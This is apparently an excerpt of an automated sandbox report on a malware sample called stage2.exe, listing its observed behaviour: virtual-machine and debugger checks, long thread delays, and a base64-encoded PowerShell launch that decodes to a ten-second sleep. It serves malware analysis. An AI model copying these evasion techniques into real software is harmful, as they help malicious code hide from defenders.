    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6540Thread sleep time: -2767011611056431s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6456Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6684Thread sleep time: -4611686018427385s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3260Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1461Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4329Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3659Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: powershell.exe, 00000002.00000002.341349368.000000000501B000.00000004.00000001.sdmpBinary or memory string: Hyper-V
    Source: Amcache.hve.26.drBinary or memory string: VMware
    Source: Amcache.hve.26.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
    Source: Amcache.hve.26.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.26.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.26.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
    Source: powershell.exe, 00000002.00000002.341349368.000000000501B000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.427690622.0000000004CA2000.00000004.00000001.sdmpBinary or memory string: hl:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
    Source: WerFault.exe, 0000001A.00000003.475719266.0000000004B86000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.475815541.0000000004BD3000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.478987968.0000000004B64000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479105876.0000000004B86000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479178780.0000000004BD3000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.26.drBinary or memory string: VMware, Inc.me
    Source: WerFault.exe, 0000001A.00000003.473935861.0000000004BD3000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: Amcache.hve.26.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
    Source: Amcache.hve.26.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
    Source: Amcache.hve.26.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.26.drBinary or memory string: VMware7,1
    Source: Amcache.hve.26.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.26.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.26.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: Amcache.hve.26.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.26.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.26.drBinary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
    Source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4}{
    Source: powershell.exe, 0000000D.00000002.431025294.0000000007A94000.00000004.00000001.sdmpBinary or memory string: hell\v1.0\Modules\Hyper-V
    Source: Amcache.hve.26.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
    Source: powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmpBinary or memory string: hl:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-VhD
    Source: C:\Users\user\Desktop\stage2.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeMemory allocated: page read and write | page guardJump to behavior

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Encrypted powershell cmdline option foundShow sources
    Source: C:\Users\user\Desktop\stage2.exeProcess created: Base64 decoded Start-Sleep -s 10
    Source: C:\Users\user\Desktop\stage2.exeProcess created: Base64 decoded Start-Sleep -s 10
    Source: C:\Users\user\Desktop\stage2.exeProcess created: Base64 decoded Start-Sleep -s 10Jump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess created: Base64 decoded Start-Sleep -s 10Jump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==Jump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==Jump to behavior
    Source: stage2.exe, 00000001.00000000.438797900.0000000001D10000.00000002.00020000.sdmp, stage2.exe, 00000001.00000000.440989456.0000000001D10000.00000002.00020000.sdmpBinary or memory string: Program Manager
    Source: stage2.exe, 00000001.00000000.438797900.0000000001D10000.00000002.00020000.sdmp, stage2.exe, 00000001.00000000.440989456.0000000001D10000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
    Source: stage2.exe, 00000001.00000000.438797900.0000000001D10000.00000002.00020000.sdmp, stage2.exe, 00000001.00000000.440989456.0000000001D10000.00000002.00020000.sdmpBinary or memory string: Progman
    Source: stage2.exe, 00000001.00000000.438797900.0000000001D10000.00000002.00020000.sdmp, stage2.exe, 00000001.00000000.440989456.0000000001D10000.00000002.00020000.sdmpBinary or memory string: Progmanlock
    Source: C:\Users\user\Desktop\stage2.exeQueries volume information: C:\Users\user\Desktop\stage2.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
